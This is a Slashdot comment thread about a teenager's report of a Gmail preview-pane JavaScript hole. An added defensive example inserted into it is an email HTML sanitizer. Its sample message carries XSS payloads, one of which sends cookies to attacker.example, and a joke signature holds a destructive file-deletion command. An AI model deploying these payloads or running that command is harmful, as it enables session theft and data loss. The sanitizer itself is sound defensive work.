Teenage Blogger Finds Gmail Hole
cpm80 wrote to mention the news that a 14 year old blogger has identified a security hole in the Gmail webmail service. From the Network World article: "He wrote that he was trying to e-mail JavaScript code from a Yahoo account to a G-mail account. The code will run in a preview pane, he wrote. But if the code is mailed from one Gmail account to another, it is filtered out, he said. Some visitors to the blog reported being able to replicate the findings, but others said later that they were not able to and that the supposed flaw had been fixed."
Something happened, he is not sure what, and now nobody can replicate it.
Stuff that matters huh?
SANS Internet Storm Center says it's fixed. Seems pretty silly.
you're all figments of my deranged imagination
I didn't realize this was new. I vaguely remember hearing about this a year or so ago. Actually, it was with any embedded javascript, images, etc., I think.
I see Windows, I see Mac. I see Linux on the rack.
... it's a testament to the speed of the Google code slingers.
As the old slashdotism proclaims: "Nothing to see here. Move along"
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
You're not dense, the article is...
He wrote that he was trying to e-mail JavaScript code from a Yahoo account to a G-mail account. The code will run in a preview pane...
in *a* preview pane... what preview pane... where? Yahoo's preview pane? How is that google's problem?
I'm totally confused...
Well, it's not like there's a risk of taking down the system with this single bug, but an interesting story nevertheless. I wonder how many of these have been discovered previously?
"I lie right back and turn the radio on..."
nt
This error should have been reported to Google and the appropriate mailing lists, not posted on a blog. Fortunately, Google responded quickly to resolve the issue before it caused damage.
- AMW
the code was "supposedly" executed in the preview pane of Gmail.
It could be used for Cross-Site Scripting (XSS), for instance, meaning that someone could send you an email and collect information on you, or make you think you're on google, but really be on another site, etc.
The preview pane is what you see before you read the message (when the list of messages is displayed - e.g. your Inbox).
Utinam logica falsa tuam philosophiam totam suffodiant!
I agree, how is it a security threat if it is removed from the email? Would it not have to be in the email to cause damage? Maybe I'm just dense too. Someone care to enlighten us?
Art by Mindy Herman, my wife.
Google have shown repeatedly that they don't understand how to deal with Javascript securely. Example.
Bogtha Bogtha Bogtha
This error should have been reported to Google and the appropriate mailing lists, not posted on a blog. Fortunately, Google responded quickly to resolve the issue before it caused damage.
If this was a security expert or professional programmer or the like, I'd agree. But he's 14! Teenagers nowadays can barely open a door without first blogging about the experience. He saw something, he said he saw something. Now he gets a little recognition, Google fixes it and everyone goes home happy.
The claimed security hole is that it is not removed if it's sent from Yahoo mail. Removing the code is the desired behaviour.
Read the article.
It says that when you send an email from gmail, the code is removed. When you send it from Yahoo, the code executes right in the gmail inbox preview. The fact that javascript from the email executes in the gmail inbox is the security hole - anybody can email javascript to you and it will execute without your permission.
But anyway, the hole must be fixed, I can't reproduce the problem, either.
Kid sends email from Yahoo -> Gmail; email contains javascript. When he checks his gmail account, that email automatically executes the javascript. Google has since fixed the problem. This was more a "proof of concept" that it would work, but a creative javascript code slinger could probably write something for malicious purposes or that could do harm.
I'm all for Google not doing stupid things on their web interface, but I don't think they should be encouraged to be even more aggressive and invasive as to what we send and receive in our e-mail. Claiming you are doing this for the users' protection just assumes that all of your users are idiots, and if you build a system that repeatedly makes that assumption then eventually all of your users will be idiots, as you will drive the others away.
I'm an American. I love this country and the freedoms that we used to have.
My first ever first post on slashdot, and I make a typo.
He found a flaw in a piece of beta software. Where's the controversy? It's not like people were running their business off a Gmail account or anything...
For more information, click here.
I'm probably just very very dense, but ... out of the description, how is that a security hole?
Basically - you don't want someone to be able to send you javascript that will execute when you read a message. It can allow the attacker far too much leeway (within the confines of your browser).
Here's an (old) example that affected Microsoft's hotmail service that gives you an idea of why you don't want javascript sent to you to execute.
Less seriously - it makes it trivial for spammers to verify that someone is opening their spam.
My pics.
Hey Maybe that mail filter should have been for INBOUND javascript in the message body instead of OUTBOUND javascript in the message body. Another injustice perpetrated upon the unsuspecting user base by those merciless hacks at "the brotherhood of the fat fingered sysadmins". :)
What's Gimto?
"I have neither the wit, nor words, nor worth to stir mens blood, I speak only right on". Billy Shakespeare
were good at finding holes to exploit. Any hole.
Er, wait. Scratch that. I'm thinking of something else.
We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
None of the stuff on that page works anymore.
Some visitors to the blog reported being able to replicate the findings, but others said later that they were not able to and that the supposed flaw had been fixed.
Can these same blog visitors please examine and fix my slow computer network?
He who knows best knows how little he knows. - Thomas Jefferson
I guess if someone else's javascript ran while reading Gmail it would be a bad thing. With Gmail (DHTML) most of the headers and some content of your messages are loaded in your browser. Everything loaded in your browser is a part of the DOM which javascript can copy, send or hide or I guess even change. Don't forget though, since Google's javascript is also running we don't know for sure if it will let the other script run, crash the browser, slow everything right down or just do whatever it wants. Theoretically it could copy every branch of the DOM and send it as an object but as far as I know javascript can only communicate to the server from which it sources.
A loop, by its nature, continues. If that didn't make sense, start reading this sentence again.
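The filtering the posts above are asking for (strip anything from an inbound message that could execute when the inbox or its preview pane renders it, because script in the message then runs inside the same page, and with the same view of the inbox DOM, as Gmail's own code), as an added example that is not part of the original thread and is not Google's code. It is a small allow-list HTML sanitizer in JavaScript plus a text-only snippet function for the inbox preview; the tag and attribute allow-lists, the function names, the attacker hostnames and the sample message are all assumptions made here for illustration, and the message is constructed, not a real capture.

```javascript
// Added example: allow-list sanitizer for inbound HTML mail bodies.
// Assumptions (not from the original thread): the body is already decoded to a
// string, and the webmail page inserts the sanitizer's output as HTML.

// Only harmless formatting survives; script, style, iframe, object, form etc. are
// dropped simply by not being listed.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'u', 'strong', 'em', 'a', 'img']);
const ALLOWED_ATTRS = { a: new Set(['href']), img: new Set(['src', 'alt']) };

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Accept only http(s)/mailto URLs. Whitespace and control characters are removed
// before the check so " jAvaScRiPt:" and "java\tscript:" do not slip past.
function safeUrl(u) {
  const v = u.trim().toLowerCase().replace(/[\x00-\x20]/g, '');
  return v.startsWith('http://') || v.startsWith('https://') || v.startsWith('mailto:');
}

function sanitizeAttrs(tag, attrString) {
  const allowed = ALLOWED_ATTRS[tag] || new Set();
  const attrRe = /([a-zA-Z][a-zA-Z0-9-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let out = '';
  let m;
  while ((m = attrRe.exec(attrString)) !== null) {
    const key = m[1].toLowerCase();
    const val = m[2] ?? m[3] ?? m[4] ?? '';
    if (!allowed.has(key)) continue;                               // kills on*, style, ...
    if ((key === 'href' || key === 'src') && !safeUrl(val)) continue; // kills javascript:
    out += ` ${key}="${escapeText(val)}"`;
  }
  return out;
}

// Tokenize into tags, comments, text and stray "<". Unknown tags are dropped,
// the *contents* of script/style are discarded, and every text node is escaped.
function sanitizeEmailHtml(html) {
  const tokenRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>|<!--[\s\S]*?-->|([^<]+)|(<)/g;
  let out = '';
  let dropUntil = null; // name of the raw-text element whose body is being discarded
  let m;
  while ((m = tokenRe.exec(html)) !== null) {
    const [tok, name, attrs, text, loneLt] = m;
    if (dropUntil) {
      if (name && tok.startsWith('</') && name.toLowerCase() === dropUntil) dropUntil = null;
      continue;
    }
    if (text !== undefined) { out += escapeText(text); continue; }
    if (loneLt !== undefined) { out += '&lt;'; continue; }
    if (name === undefined) continue;                 // HTML comment
    const tag = name.toLowerCase();
    const closing = tok.startsWith('</');
    if (tag === 'script' || tag === 'style') { if (!closing) dropUntil = tag; continue; }
    if (!ALLOWED_TAGS.has(tag)) continue;
    out += closing ? `</${tag}>` : `<${tag}${sanitizeAttrs(tag, attrs)}>`;
  }
  return out;
}

// The inbox snippet ("first few words of the body") needs no markup at all, so
// nothing from the message can ever become an element in the inbox page.
function previewText(html, maxChars = 60) {
  const plain = sanitizeEmailHtml(html).replace(/<[^>]*>/g, ' ').replace(/\s+/g, ' ').trim();
  return plain.slice(0, maxChars);
}

// Constructed sample message (not a real capture): what a hostile sender could
// put in an HTML body if the receiving webmail rendered it untouched.
const SAMPLE_MAIL = [
  '<p>Hi <b>there</b>,</p>',
  '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
  '<img src="http://example.com/pic.png" onerror="document.location=\'http://attacker.example\'">',
  '<a href="javascript:alert(document.domain)">see this</a>',
].join('');

console.log(sanitizeEmailHtml(SAMPLE_MAIL));
console.log(previewText(SAMPLE_MAIL));
```

The three payloads in the sample (a script element, an event handler on an image, a javascript: link) are exactly the constructs a preview pane must never pass through, and each is removed by a different rule: unlisted tag, unlisted attribute, unsafe URL scheme. A regex tokenizer is enough to show the idea, but a real mail front end should build this on a proper HTML parser so that malformed markup (an unterminated quote, a `>` inside an attribute value) cannot desynchronise the tokenizer from the browser's own parse.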
what in gods name are you talking about? sorry, not everything in the world involves 9/11 and in you know, reality, very little actually changed post 9/11
The phrase "more better" is acceptable English. suck it grammar Nazis
In other news, a regular slashdot poster who doesn't get it, that links etc belong to the signature and not to the post itself...
gmail provides a "preview" of each mail (first few words from the body of the mail) in the inbox.
Teenage Computer Geek Finds Hole
Girlfriend says "Finally!"
Find environmentally and socially responsible products on http://buy-right.net
Just last night I had that problem. I renamed the .exe to .ex and zipped it (without any password). I've also used .bat --> .bat.bak in the past.
Anywhere near Cuba?
There are 10 types of people in the world... those who understand binary and those who don't.
Oh, he knows exactly what he's doing. Google "religious freaks." Guess what comes up? Every time he posts a comment and tacks that on the end, Googlebot snags it and bumps it up cos it's coming from a reputable site (well, PageRank-wise at least ;) Slashdot sigs don't have the luxury of being indexed (you gotta be logged in to see them).
This guy's the limit!
Hmm, on September 10, 2001:
The world is run by small-minded militaristic plutocrats with no concern for human life or the future of the planet who rule by intimidation and fear.
On March 2, 2006:
The world is run by small-minded militaristic plutocrats with no concern for human life or the future of the planet who rule by intimidation and fear.
Brave New World, eh?
That summary reads like any number one of my first attempts at writing:
I said "I'm hungry".
"How come?" Bill said.
"I didn't eat," I said.
Bill said, "That stinks."
I said "It sure does".
http://www.nsgtmo.navy.mil/nsgtmohome.htm
No, the security hole is that gmail will execute javascript in e-mail. You can't assume that all clients on the web will filter out javascript before sending them gmail's way.
A big gaping hole is found in Zonk's head.
Sorry, but you are wrong. The treatment of group nouns as plural is perfectly normal and acceptable outside of America. Consult your international grammar nazi style guide for details.
Gmail blocks outbound attachments with exe files, even when those files are included inside zip files.
I don't think GMail and other mail systems need to be "fixed"...I think that people have to get out of the mindset of using email to exchange files. Use secure FTP or even HTTPS...or even better for big files use Bittorrent. It annoys me when people complain about limits on email attachments just like it annoys me when people use Excel to create "databases". At least learn to use MS Access dammit...it isn't THAT hard!
Google is RIGHT in doing such filtering, although perhaps they should make it clear to users up front on its filtering policies rather than waiting for them to discover it for themselves. Besides, even if outbound executable attachments are blocked how many corporate systems permit them inbound? My employer blocks inbound executables unless you're in certain departments, and the majority of our clients do as well. These systems are getting very smart too--they analyse the actual content of the file rather than the extension and even if you rename your .exe to .abc, ZIP it and rename the .zip extension .xyz our system will check the header content of the files' data and determine it is a ZIP, then extract the files inside to examine THEM if that is how you configure it.
The point is that email was not designed for file transfer and probably will never be the best tool for that purpose. Unfortunately it cannot always be avoided but it should be wherever possible. If email was seen as a good way to transfer files then FTP wouldn't have been invented--people would've extended email to do it from the start. Since FTP is still around today and is now extended to secure FTP with SSL encryption and authentication THAT is the tool that professionals should use to send such files (that is what I do anyways).
There are some cases where email is the most convenient, such as for non-executable documents (I avoid sending .docs since I consider them "executable"--I send PDFs instead), smaller files and so on. For dealing with more novice users I send an email with the link to the file to click, and for getting files from them I set up a simple HTTPS "gateway" with a file submission form. Just as simple as attachments (for the client anyways) and more secure.
If the kid was looking to better humanity, he probably would have reported the flaw to Google before blogging on it. He should read the RFPolicy before he ends up being a scapegoat under someone's corporate bus.
What about the sole (both administrator and technical) contact for the entire Iraq domain?
script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"
...instead of the appropriate ad.
Any healthy kid online would be hitting the pron!
Engineering is the art of compromise.
No, it's closer to Flordia.
120 characters for a sig? That's bloody useless.
You mean somewhere in the Caribeban?
How can a post be modded "overrated" or "underrated" when it hasn't been rated yet?
Iraq's a beta country: occasional big glitches here and there, but some people seem to trust in it a lot more than others. It seems only natural that they'd rely on a beta e-mail service. :)
by the time you finished typing your comment, 2 newer distros were released. man, you must practise and go beyond 60 wpm!
And this is news why? In another related story, teenager stubs toe and blames Microsoft and Google China. Who cares.
I am scared by how many of my clients are using one AOL, Earthlink, Gmail, Hotmail, etc. mailbox for their entire company.
And I know exactly that he knows exactly what he is doing. There were other people adding their links like him until they got modded down for it. So moderators, stand up.
The kid's code might be deadly, but after reading his blog, I notice he can barely formulate a coherent English sentence.
- P
Geez! Please! Use your sarcasm tags!
It's been shown that you could email someone a redirect, so any time they view their inbox (using non-standard HTML mode) it would send them to the link you provide.
There is a bug in a piece of beta software??? That is unheard of.
Johnkoerner.com
Oddly, it's in Cuba.
www.joshferguson.org
God I cant stand that fucking word!
Die pls!
Also he's 14, post pic pls!
Slashcode doesn't even put in rel=nofollow. Why isn't there more link spam here?!?
new. not newest.
welcome to missing the joke
drive carefully.
my password really is 'stinkypants'
it certainly underscores a strength of web based applications: it was looking like a bug one morning but by afternoon, only fixed versions of the code were to be found. Centralized reloading of gmail's servers means everybody got the fix at the same time more or less. What would the time line of such a security hole be if it occurred in Outlook? Eudora?
SLASHDOT: news for people who can't concentrate on work or have no life at all and got tired of yelling back at the TV.
This story actually broke on Digg.com by the way, not mentioned in the summary.
Obviously you don't know anything about javascript. Go to www.google.com and type in XSS and you will find your answer.
Obviously you didn't read enough, it's been proven and shown to work already: by sending a document.location='yahoo.com'; redirect, users were sent to yahoo.com every time they viewed their inbox. Go read the digg.com comments.
Because of XSS scripting attacks, I imagine.
find / -name "*.sig" | xargs rm
What does running Javascript "from gmail.com" even mean? Javascript is run on a client machine. So you can put Javascript in your code, and it will parrot it back to you. How exactly is this a security vulnerability? You could run the same code from anywhere - it doesn't have to be Gmail.com supplied Javascript code. Please correct me if I don't understand, but if he just got gmail to give him back his own javascript code, there is no vulnerability. How is it going to run "from the gmail servers"? And even if it COULD do that, how do we know gmail hasn't sandboxed it in some manner?
I should just post shit like "Hotmail.com vulnerability found!" all the time. Maybe I could garner this kind of media attention.
Did you ever notice that *nix doesn't even cover Linux?
THANK YOU!
You stated that in clear terms that hopefully everyone else understands. I read the article, but saw too many posts saying "so what?" or "thats not a security breach."
How much is your data worth? Back it up now.
I, for one, welcome our new 13-year old hacker overlords.
Error #13: No coffee. Operator halted. Please place boot device at bottom.
...you have a gmail account, for example. In the long run, I always prefer to get more information, rather than less. The people complaining about this story being on /. can simply choose not to read it. If you don't like what's on, change the [website].
Besides, the point isn't the "size" of the bug or it's potential to cause damage. The "point", and the benefit, of an article such as this one is that when people make others aware of problems in a company's product, it allows said people to make a more educated decision on using or not using the product. In addition, when a company's products are consistently shown to be problematic in some fashion and the company is shown to ignore said problems regularly, this also allows a consumer to steer clear of a company that doesn't hold their customer's best interests at heart.
"First they ignore you, then they laugh at you, then they fight you, then you win."
-Gandhi
You figured out my social experiment / hack! (I'm not kidding) How do you get Slashdot to post a story? I figured slashdot would run any story about Google. Excellent.
"Hacked his own computer" is not worth any street cred.
So it instead becomes "Hacked the Fed, transferred $9bn to my Swiss account and I'm leaving the country scot-free!"
Sig for hire.
What is so hard about this? It's very obvious to see the security risks associated with this vulnerability. And yes, it is a vulnerability. Are all the previous posters the same guys from Microsoft who sat in a board room, straight faced, and decided letting other people run C++/Java code on your Internet Explorer window would be a GOOD idea?
Way to go! You just set up tomorrow's "Google has a security hole" Slashdot story. You get +1 Foresightful. :)
-- What you do today will cost you a day of your life.
I can think of plenty of changes that happened as a result of 9/11, mainly that idiots whom we'd spent years beating into silence suddenly felt at liberty to speak up again. Many of them working for the government.
Pfft, just use a mail client like Thunderbird or kmail.
Change is certain; progress is not obligatory.
how often do you coders send your code in the body of an email message?? i mean, are CVS's, RDS's and hell, even throwing your shit in a zip file that outdated already??
*plays the Apogee theme song music*
You're unable to execute arbitrary javascript in *someone else's* browser because Google filters it out? In other news, banks foil bank robbers by storing money in large metal boxes.
This is one Gmail bug I see of late... I get mails with lots of pics in them forwarded by friends to my gmail account without a problem. However when I forward it to any other email address (including to my own Gmail address), only the text appears & the pics don't (only rectangles with 'X' appear). I have been having this problem for the last week or so only. Has any one of you come across such a problem too?
Why does yahoo do this
Any limitations on "servers" by shortsighted and greedy ISPs are artificial restrictions on already capable technology.
Unfortunately, "shortsighted and greedy ISPs" who impose "artificial restrictions on already capable technology" are the norm, and if both the local telephone company and local cable company charge exorbitant rates to lift the TOS restrictions, then you're going to see continued use of either e-mail or web space to transfer files.
if you attach a large file to email, then hit send, you STILL have to be online for the entire duration it is moved to the email server. If you had to be the first seed for a torrent you wouldn't have to be online for that much longer.
The difference is that once you click send in an e-mail, FTP, or HTTP user agent (or in any other store-and-forward system), you wait only for the e-mail program to report that it has finished encoding and transferring the file. In BitTorrent, on the other hand, you have to leave your computer dialed up to the Internet (and miss voice telephone calls) until the intended recipient replies that he or she has received the file.
we'll continue to have people try to ... use email like instant messaging (or vice versa, deliberately leaving big IMs when they KNOW the recipient is offline)
The difference is that IM spam is perceived to be less common than e-mail spam, which in my experience tends to make it past even SpamAssassin too often.
And before the software developers get overly ornery about not being able to email binaries to each other, or code trees that contain binaries, I will happily recommend Sourceforge to them. (www.sf.net)
Not all software is 1. intended for consumption by the general public, 2. Free, and 3. in one of the specific categories of functionality that SourceForge.net accepts. Or did you mean installing GForge or SourceForge Enterprise Edition on a server controlled by the developer?
I can't say "Hey, give me your FTP address, and I'll send you that file".
So say "Here is my FTP address; log in anonymously and get the file." Or, equivalently, "I've uploaded the file to my web space; go to this URL to get the file."
The lazy people are the people who don't go to enough effort to install secure software.
Unfortunately, the lazy people are the majority, and you are the minority.
I actually pay an ISP every month, and use Eudora to send and receive mail. And nobody censors me.
You are lucky to have been born in a town whose local mono- or duopoly residential broadband ISP does not censor your attachments. Had you been born in an SBC state (now at&t), you might have got stuck with Yahoo! mail and all its restrictions, as SBC has partnered with Yahoo! for quite some time now.
My clients won't know its an email address if they don't see 'hotmail' or 'yahoo' on my business card
Wouldn't the commercial at sign ('@') be enough to clue them in?
the '....' denoted sarcasm
If you want your ironic message to cross the sar-chasm intact, it's best to use well-known protocols. Better-recognized end tags for sarcasm are ;-) or </sarcasm> (written as </sarcasm> in Slashdot comment markup).